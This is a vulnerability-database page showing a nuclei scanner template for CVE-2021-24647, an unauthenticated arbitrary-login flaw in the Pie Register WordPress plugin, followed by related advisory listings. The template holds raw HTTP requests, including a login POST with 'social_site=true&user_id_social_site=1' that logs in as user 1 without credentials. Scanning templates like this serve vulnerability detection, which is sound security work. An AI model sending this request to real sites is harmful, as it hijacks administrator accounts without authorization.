Lucene search
+L

Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login

🗓️ 07 Aug 2026 20:01:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 88 Views

Pie Register plugin <3.7.1.6 - Unauthenticated Arbitrary Login fla

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Improper Authentication in Genetechsolutions Pie_Register
15 Jun 202309:51
githubexploit
attackerkb
ATTACKERKB
CVE-2021-24647
8 Nov 202118:15
attackerkb
circl
Circl
CVE-2021-24647
29 Jul 202612:00
circl
cnnvd
CNNVD
WordPress 插件授权问题漏洞
8 Nov 202100:00
cnnvd
cnvd
CNVD
WordPress Pie Register Plugin Authorization Issues Vulnerability
10 Nov 202100:00
cnvd
cve
CVE
CVE-2021-24647
8 Nov 202117:34
cve
cvelist
Cvelist
CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
8 Nov 202117:34
cvelist
nvd
NVD
CVE-2021-24647
8 Nov 202118:15
nvd
osv
OSV
CVE-2021-24647
8 Nov 202118:15
osv
patchstack
Patchstack
WordPress Pie Register plugin <= 3.7.1.5 - Unauthenticated Arbitrary Login vulnerability
11 Oct 202100:00
patchstack
Rows per page
id: CVE-2021-24647

info:
  name: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
  author: DhiyaneshDK
  severity: high
  description: |
    The Registration Forms  User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
  impact: |
    An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information.
  remediation: Fixed in version 3.7.1.6
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24647
    - https://github.com/RandomRobbieBF/CVE-2021-24647
    - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2021-24647
    cwe-id: CWE-287
    epss-score: 0.0968
    epss-percentile: 0.95023
    cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: genetechsolutions
    product: pie_register
    framework: wordpress
  tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions,vkev,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body_1, "pieregister")'
          - 'contains(body_3, "Username") && contains(body_3, "email-description")'
        condition: and
# digest: 490a0046304402202183cfc7f3e5108afd7e164931f1c8219216a905c6862d14807d466d0adfe48b022078b8c8447071460cf1813766ac0549194e50d4ef5f2385cf24795fc3aba71972:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 26.8
CVSS 3.18.1
EPSS0.0968
88